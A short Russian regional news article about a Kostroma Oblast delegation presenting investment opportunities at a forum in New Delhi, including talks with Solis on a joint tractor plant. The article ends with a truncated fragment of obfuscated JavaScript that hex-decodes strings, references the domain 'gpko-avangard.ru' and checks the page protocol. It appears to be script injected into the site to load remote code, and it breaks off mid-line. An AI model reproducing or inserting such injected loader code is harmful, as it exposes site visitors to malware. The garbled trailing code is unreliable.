Регион: Кострома в Индии

Регион: Кострома в Индии

Ювелирная промышленность, лесопереработка, фармацевтика и машиностроение — взаимный интерес в этих сферах обозначили индийские предприниматели и руководство Костромской области. Инвестиционный потенциал региона как один из наиболее привлекательных в России был представлен в минувшую субботу на международном форуме в Нью-Дели (Индия). 

Костромская область была представлена наряду с республикой Башкортостан и Мордовией, Пензенской областью, отмеченными Агентством стратегических инициатив как наиболее успешные в плане инвестиционной привлекательности в России.
Первая бизнес-миссия костромской делегации в Индию прошла успешно. Компания Solis — производитель сельскохозяйственной техники, заинтересована в создании совместного производства тракторов в Костромской области. Речь идёт о создании совместного предприятия с Костромским заводом автокомпонентов, который обладает аналогичным профилем. Индия оценивает объём рынка в 10 тыс. тракторов в год. Дальнейшее обсуждение проекта состоится в марте, когда представители компании приедут в Россию.
Кроме того, обсуждались на сессии и проекты в сфере ювелирной и фармацевтической промышленности.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gpko-avangard.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e